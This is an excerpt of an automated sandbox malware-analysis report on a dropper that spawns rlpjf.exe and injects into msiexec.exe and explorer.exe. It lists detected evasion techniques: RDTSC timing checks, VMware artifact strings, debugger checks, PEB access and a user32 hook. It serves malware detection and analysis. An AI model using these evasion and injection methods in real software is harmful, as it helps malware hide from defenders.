          Source: Binary string: C:\xhhad\uirflg\frvl\265a3cee655e492f8e5d84a11f9c3616\cgbuhi\tigzjzwb\Release\tigzjzwb.pdb source: lamsddre43321.exe, 00000000.00000002.292027009.000000000040B000.00000004.00000001.01000000.00000003.sdmp, lamsddre43321.exe, 00000000.00000002.296306970.000000000288E000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000000.266573829.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000001.00000002.276856071.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000002.00000000.274730046.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, msiexec.exe, 0000000F.00000002.541755061.00000000054CF000.00000004.10000000.00040000.00000000.sdmp, rlpjf.exe.0.dr, nsrD708.tmp.0.dr
          Source: Binary string: wntdll.pdbUGP source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001AF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001AF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A842 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EB7C push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00416B32 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EBC6 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00417D4A push ss; iretd
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041ED04 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EE41 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EF5F push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D7B1 push dword ptr [AD64B49Bh]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0501D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5A842 push edx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5EBC6 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5EB7C push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D56B32 push esi; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D57D4A push ss; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D56C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5ED04 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D502 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D50B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5EE41 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D7B1 push dword ptr [AD64B49Bh]; ret
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\lamsddre43321.exeFile created: C:\Users\user\AppData\Local\Temp\rlpjf.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEB
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001A5219 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\lamsddre43321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lamsddre43321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6856Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeAPI coverage: 5.6 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.1 %
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\lamsddre43321.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000000.333032934.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000003.00000000.308178773.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000003.00000000.360860709.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000003.00000000.287015168.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.283466683.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000003.00000000.293538431.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.333032934.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001AE891 _memset,IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B4395 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B538A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED03F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED06F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED0772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED0736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0504A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05003D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05043540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05073D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05078DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA61C mov eax, dword ptr fs:[00000030h]
